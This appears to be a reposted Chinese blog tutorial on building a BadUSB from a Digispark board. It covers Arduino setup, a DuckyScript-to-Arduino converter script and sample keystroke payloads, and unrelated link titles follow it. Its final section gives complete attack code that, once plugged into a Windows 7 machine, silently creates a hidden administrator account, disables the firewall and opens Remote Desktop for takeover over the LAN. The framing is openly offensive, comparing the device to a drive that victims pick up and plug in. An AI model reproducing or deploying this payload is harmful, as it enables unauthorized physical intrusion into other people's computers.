U盘攻击：无视防火墙-3秒黑掉你的电脑|BadUSB-制作教程

BadUSB简介

吾旧友，拾U盘,彼异之，插PC，遂上线。这个愚蠢精彩故事不禁让我萌生学习制作一个BadUSB的想法，为了贴合实际，特地从某宝入手了一个BadUSB板，如下图所示。

简单来说，通过硬件直接插入对方电脑，让对方电脑执行代码，达到控制主机或者窃取信息等目的(需要自行发挥想象)

准备工具

一个BadUSB_Rubber_Ducky(橡皮鸭)Arduino的IDE - 下载地址：(https://www.arduino.cc/en/Main/Software)DPinst64驱动(根据电脑型号来,普遍都是64位操作系统)

安装工具

Arduino的安装就不讲了，傻瓜式安装:安装包 - 下一步 - 完成！

DPinst64驱动安装的时候要选择始终信任来自Digistump LLC - 安装 - 下一步 - 完成！

Arduino环境配置

首先打开Arduino - 文件 - 首选项 - 附加开发板管理器网址:

http://digistump.com/package_digistump_index.json

在工具 - 开发板管理器 - 先等待它下载完文件:

接着在类型下拉菜单里有一个贡献然后选择Digistump_AVR安装完毕就Ok

最后选择开发板对应的开发板型号和编程器然后选择Keyboard一个模板：

代码编写

这是它示例的代码：

#include "DigiKeyboard.h"void setup() {// don't need to set anything up to use DigiKeyboard
}void loop() {// this is generally not necessary but with some older systems it seems to// prevent missing the first character after a delay:DigiKeyboard.sendKeyStroke(0);// Type out this string letter by letter on the computer (assumes US-style// keyboard)DigiKeyboard.println("Hello Power_Liu");// It's better to use DigiKeyboard.delay() over the regular Arduino delay()// if doing keyboard stuff because it keeps talking to the computer to make// sure the computer knows the keyboard is alive and connectedDigiKeyboard.delay(5000);
}

上传烧录:

提示:Running Digispark Uploader…Plug in device now… (will timeout in 60 seconds)

这个时候需要60s的时间插入你的BadUSB:

提示： Micronucleus done. Thank you! 说明已经上传成功！这个时候插入BadUSB它会一直输入Hello Power_Liu直到拔掉为止:

手把手教你写一个”Hello Hacker!”

1、先在记事本中写好我们的代码 - 另存为 hacker.txt:

//这个代码的意思就是打开cmd，然后输出Hello Hacker!
DELAY 5000
GUI r
DELAY 500
STRING cmd
DELAY 500
ENTER
ENTER
DELAY 1000
STRING Hello Hacker!
DELAY 1500
ENTER
ENTER

2、使用我们的Python转换脚本吧hacker.txt转换为ino文件：

Duckyspark_translator.py hacker.txt hacker

Python转换脚本源代码:

# -*- coding:utf-8 -*-from __future__ import print_function
import syspayload_input = ''
l='//'
mod_input=''
mod_output=''def replacement():print ('DigiKeyboard.', end ='')print(
str(l.replace(' a', 'KEY_A').replace(' a ', 'KEY_A')
.replace(' b', 'KEY_B')
.replace(' c', 'KEY_C')
.replace(' d', 'KEY_D')
.replace(' e', 'KEY_E')
.replace(' f', 'KEY_F')
.replace(' g', 'KEY_G')
.replace(' h', 'KEY_H')
.replace(' i', 'KEY_I')
.replace(' j', 'KEY_J')
.replace(' k', 'KEY_K')
.replace(' l', 'KEY_L')
.replace(' m', 'KEY_M')
.replace(' n', 'KEY_N')
.replace(' o', 'KEY_O')
.replace(' p', 'KEY_P')
.replace(' q', 'KEY_Q')
.replace(' r', 'KEY_R')
.replace(' s', 'KEY_S')
.replace(' t', 'KEY_T')
.replace(' u', 'KEY_U')
.replace(' v', 'KEY_V')
.replace(' w', 'KEY_W')
.replace(' x', 'KEY_X')
.replace(' y', 'KEY_Y')
.replace(' z', 'KEY_Z')#1-0 if needed#f1-f12
.replace(' F1','KEY_F1')
.replace(' F2','KEY_F2')
.replace(' F3','KEY_F3')
.replace(' F4','KEY_F4')
.replace(' F5','KEY_F5')
.replace(' F6','KEY_F6')
.replace(' F7','KEY_F7')
.replace(' F8','KEY_F8')
.replace(' F9','KEY_F9')
.replace(' F10','KEY_F10')
.replace(' F11','KEY_F11')
.replace(' F12','KEY_F12')
#arrows
.replace('LEFTARROW', 'KEY_ARROW_LEFT')
.replace('RIGHTARROW', 'KEY_ARROW_RIGHT')
.replace('UPARROW','KEY_ARROW_UP')
.replace('DOWNARROW','KEY_ARROW_DOWN')
.replace('LEFT', 'KEY_ARROW_LEFT')
.replace('RIGH', 'KEY_ARROW_RIGHT')
.replace('UP','KEY_ARROW_UP')
.replace('DOWN','KEY_ARROW_DOWN')
#keys
.replace('PRINTSCREEN','sendKeyStroke(KEY_PRT_SCR' )
.replace('TAB', 'sendKeyStroke(KEY_TAB')
.replace('SPACE', 'sendKeyStroke(KEY_SPACE')
.replace('CONTROL ALT','sendKeyStroke(MOD_ALT_RIGHT,')
.replace('CTRL ALT','sendKeyStroke(MOD_ALT_RIGHT,')
.replace('ESCAPE','sendKeyStroke(KEY_ESC' )
.replace('ENTER','sendKeyStroke(KEY_ENTER')),end = '')print(');')def modreplacement():print ('DigiKeyboard.', end ='')print('sendKeyStroke(', end = '')print(
str(l.replace (mod_input, '').replace(' a', 'KEY_A').replace(' a ', 'KEY_A')
.replace(' b', 'KEY_B')
.replace(' c', 'KEY_С')
.replace(' d', 'KEY_D')
.replace(' e', 'KEY_E')
.replace(' f', 'KEY_F')
.replace(' g', 'KEY_G')
.replace(' h', 'KEY_H')
.replace(' i', 'KEY_I')
.replace(' j', 'KEY_J')
.replace(' k', 'KEY_K')
.replace(' l', 'KEY_L')
.replace(' m', 'KEY_M')
.replace(' n', 'KEY_N')
.replace(' o', 'KEY_O')
.replace(' p', 'KEY_P')
.replace(' q', 'KEY_Q')
.replace(' r', 'KEY_R')
.replace(' s', 'KEY_S')
.replace(' t', 'KEY_T')
.replace(' u', 'KEY_U')
.replace(' v', 'KEY_V')
.replace(' w', 'KEY_W')
.replace(' x', 'KEY_X')
.replace(' y', 'KEY_Y')
.replace(' z', 'KEY_Z')#1-0#f1-f12
.replace(' F1','KEY_F1')
.replace(' F2','KEY_F2')
.replace(' F3','KEY_F3')
.replace(' F4','KEY_F4')
.replace(' F5','KEY_F5')
.replace(' F6','KEY_F6')
.replace(' F7','KEY_F7')
.replace(' F8','KEY_F8')
.replace(' F9','KEY_F9')
.replace(' F10','KEY_F10')
.replace(' F11','KEY_F11')
.replace(' F12','KEY_F12')#arrows
.replace('LEFTARROW', 'KEY_ARROW_LEFT')
.replace('RIGHTARROW', 'KEY_ARROW_RIGHT')
.replace('UPARROW','KEY_ARROW_UP')
.replace('DOWNARROW','KEY_ARROW_DOWN')
.replace('LEFT', 'KEY_ARROW_LEFT')
.replace('RIGH', 'KEY_ARROW_RIGHT')
.replace('UP','KEY_ARROW_UP')
.replace('DOWN','KEY_ARROW_DOWN').replace('PRINTSCREEN','sendKeyStroke(KEY_PRT_SCR' )
.replace('TAB', 'sendKeyStroke(KEY_TAB')
.replace('ESCAPE','KEY_ESC' )
.replace('SPACE', 'KEY_SPACE')
.replace(' ','')
.replace('ENTER','KEY_ENTER')),end = '')print(','+mod_output, end = '')                print(');')#arguments
if len(sys.argv) == 2:try:payload_input = open(sys.argv[1], "r")sys.stdout = open("digipayload.ino", "w")z = len(open(sys.argv[1], "r").readlines())except IOError:print('\nError! File "'+sys.argv[1]+'" does not exist!\n' )exit()
elif len(sys.argv) == 3:try:payload_input = open(sys.argv[1], "r")sys.stdout = open(sys.argv[2]+'.ino', 'w')z = len(open(sys.argv[1], "r").readlines())except IOError:print('\nError!, File "'+sys.argv[1]+'" does not exist!\n' )exit()
elif len(sys.argv) > 3:print('Too much Arguments')exit()
else:    payload_input = open('payload.txt', "r")sys.stdout = open("digipayload.ino", "w")z = len(open('payload.txt', "r").readlines())#--------------------------------------
#Digispark program fragment
print('//www.liuwx.cn&Qq211124332')
print('#include "DigiKeyboard.h"')
print('#define KEY_ESC     41')
print('#define KEY_BACKSPACE 42')
print('#define KEY_TAB     43')
print('#define KEY_PRT_SCR 70')
print('#define KEY_DELETE  76\n')print('void setup() {\n')
print('DigiKeyboard.delay(5000);') #windows mozhet dolgo raspoznavat digispark potomu bylo resheno dobavlyat 5 sek delay vmesto 0.5sek
print('DigiKeyboard.sendKeyStroke(0);')
#---------------------------------------for i in range(z):l = payload_input.readline().replace('\n', '')if len (l) < 1:print('', end = '')else:if 'REM' in l:print ('//', l)    else:if 'DELAY' in l:print ('DigiKeyboard.', end = '')print (l.replace('DELAY', 'delay(').replace(' ',''), end = '')print(');')elif 'STRING' in l:print ('DigiKeyboard.', end = '')print (l.replace('"', '")); DigiKeyboard.print(char(34)); DigiKeyboard.print(F("').replace('\\', '")); DigiKeyboard.print(char(92)); DigiKeyboard.print(F("').replace('STRING ','print(F("'), end = '')print ('")', end = '')print(');');elif (l == 'GUI') or (l == 'WINDOWS') or (l == 'CONTROL ESCAPE'):print('DigiKeyboard.sendKeyStroke(KEY_ESC,MOD_CONTROL_LEFT);')elif (l == 'GUI d') or (l == 'WINDOWS d'):print ('DigiKeyboard.sendKeyStroke(KEY_D,MOD_GUI_LEFT);')elif (l == 'WINDOWS r') or (l == 'GUI r'):print ('DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT);')elif 'MENU' in l:print ('DigiKeyboard.sendKeyStroke(MOD_GUI_RIGHT);')#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!INVERCE!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!    elif 'CTRL ALT' in l:replacement()elif 'ALT' in l:mod_input = 'ALT'mod_output = 'MOD_ALT_RIGHT'modreplacement()elif 'CTRL' in l:mod_input = 'CTRL'mod_output = 'MOD_CONTROL_LEFT'modreplacement()elif 'CONTROL' in l:mod_input = 'CONTROL'mod_output = 'MOD_CONTROL_LEFT'modreplacement()#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!        else:replacement()if len(l) <1:print('', end = '')
#Digispark program fragment
print('\n}')
print('\n')
print('void loop() {\n')
print('}\n')
#-----------------------------------payload_input.close()

转换完成后再当前目录下会有一个hacker.ino文件：

打开后的代码是这样的：

//www.liuwx.cn&Qq211124332
#include "DigiKeyboard.h"
#define KEY_ESC     41
#define KEY_BACKSPACE 42
#define KEY_TAB     43
#define KEY_PRT_SCR 70
#define KEY_DELETE  76void setup() {DigiKeyboard.delay(5000);
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(5000);
DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT);
DigiKeyboard.delay(500);
DigiKeyboard.print(F("cmd"));
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1000);
DigiKeyboard.print(F("Hello Hacker!"));
DigiKeyboard.delay(1500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(KEY_ENTER);}void loop() {}

3、上传脚本 - 插入BadUSB进行烧录程序:

上传成功后，它会自动执行我们的操作：会在屏幕上输出Hello Hacker！

插上U盘入侵局域网Win7登陆它的远程桌面

本来想写MSF + BadUSB 反弹Win7和Win10的Shell，但是百度上有了，我就没必要写在这篇文章了！

思路和主要步骤

1、在局域网中有一台PC-Win7系统2、插上BadUSB关掉Win7的防火墙3、创建一个HACKER的用户并提权为超级管理员4、开启Win7的33895、局域网另一台电脑mstsc登陆Win7的桌面

命令注释

关闭防火墙的命令：netsh firewall set opmode mode=disable打开Win7的3389命令：REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f至于我为什么会吧上面这条开3389的命令有些字母是大写又有些字母是小写：reg add hklm\\system\\cURRENTcONTROLsET\\cONTROL\\tERMINAL\" \"sERVER /V FdENYtscONNECTIONS /T reg_dword /D 0 /F因为插入BadUSB会首先按下我们的大写锁定!然后才执行命令，因为怕有的电脑有中午输入法！所以我上面的语句要这样写！他会吧小写的在DOS窗口输出为大写，大写的命令会输出为小写！按下回车键：DigiKeyboard.sendKeyStroke(KEY_ENTER); 延迟2秒执行（有的时候延迟时间短了会执行失败）：DigiKeyboard.delay(2000);

附上代码如下：

//www.liuwx.cn QQ211124332#include "DigiKeyboard.h"
#define KEY_ESC     41
#define KEY_BACKSPACE 42
#define KEY_TAB     43
#define KEY_PRT_SCR 70
#define KEY_DELETE  76
#define KEY_CAPS_LOCK  0x39void setup() {DigiKeyboard.delay(2000);
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(2000);
DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT);
DigiKeyboard.sendKeyStroke(KEY_CAPS_LOCK);
DigiKeyboard.delay(500);
DigiKeyboard.print(F("cmd"));
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1000);
DigiKeyboard.print(F("color c"));
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(200);
DigiKeyboard.print(F("net user hacker Qliuwx123@ /add"));
DigiKeyboard.delay(1000);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(300);
DigiKeyboard.print(F("net localgroup administrators hacker /add"));
DigiKeyboard.delay(1000);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.print(F("netsh firewall set opmode mode=disable")); //关闭防火墙
DigiKeyboard.delay(1000);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1000);
DigiKeyboard.print(F("reg add hklm\\system\\cURRENTcONTROLsET\\cONTROL\\tERMINAL\" \"sERVER /V FdENYtscONNECTIONS /T reg_dword /D 0 /F"));  //开3389
DigiKeyboard.delay(1000);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(KEY_ENTER);}void loop() {}

具体演示的效果我放到了B站上：

插上U盘开启Win7的3389并关闭防火墙实施登陆它远程桌面

查看全文

http://www.taodudu.cc/news/show-5403770.html

拾麦子 java蓝桥杯算法省题
创建可引导的Ubuntu USB闪存盘
java电话键盘字母数字转换_用Java语言将一个键盘输入的数字转化成中文输出
计算机固态硬盘与机械硬盘的区别是什么,怎么辨别电脑里面的cde盘是机械硬盘还是固态硬盘...
安装linux7如何查看u盘位置,CentOS 7 如何通过U盘安装？【新手简单教程】
php盯盘,操盘手教你盯盘：盘口挂单之分时图盯盘界面
重拾键盘
Java获取客户端（浏览器）的MAC地址
rime切换全角标点和半角标点
半角全角区别
ESP8266 + MQTT固件（四博智联、安信可）
安信可TB蓝牙模组系列 APP Ble Mesh组网教程
【安信可LoRa模组专题①】安信可LoRa快速入门指南
【小米米家对接连载】安信可 ESP8266-12S模块作为米家通用模块，直连小米米家平台，小爱同学语音控制；
安信可 ESP8266机智云开发板：编译与烧录
安信可lora模块测试程序
【离线语音专题④】安信可VC离线语音开发板二次开发语音控制LED灯
【BW16 应用篇】安信可BW16模组/开发板AT指令实现MQTT通讯
【安信可NB-IoT模组EC系列应用笔记⑤】安信可微信公众号北斗定位显示EC-01F+GP-01模组
安信可PB系列蓝牙模组 APP Ble Mesh组网教程
安信可PB-01/02蓝牙模组实现远程OTA无线升级功能介绍，剖析整个实现原理和代码介绍。
安信可推荐 | 安信可ESP32-S3系列模组和ESP8266系列模组硬件参数对比。
微信小程序获取手机号详细过程（新版本2.21.2）（旧版本兼容）
uniapp微信小程序授权登录并获取手机号
使用easyPoi导出word文档并使用openoffice把word转换为pdf格式
Word处理控件Aspose.Words功能演示：在 C# .NET 中将 Word 转换为 PDF - 完整指南
Qt多线程下Word转换为PDF
可扩展性技术组织的角色——RASCI工具
关于VB6类模块中错误捕捉的问题
ubuntu18.04为浏览器安装flash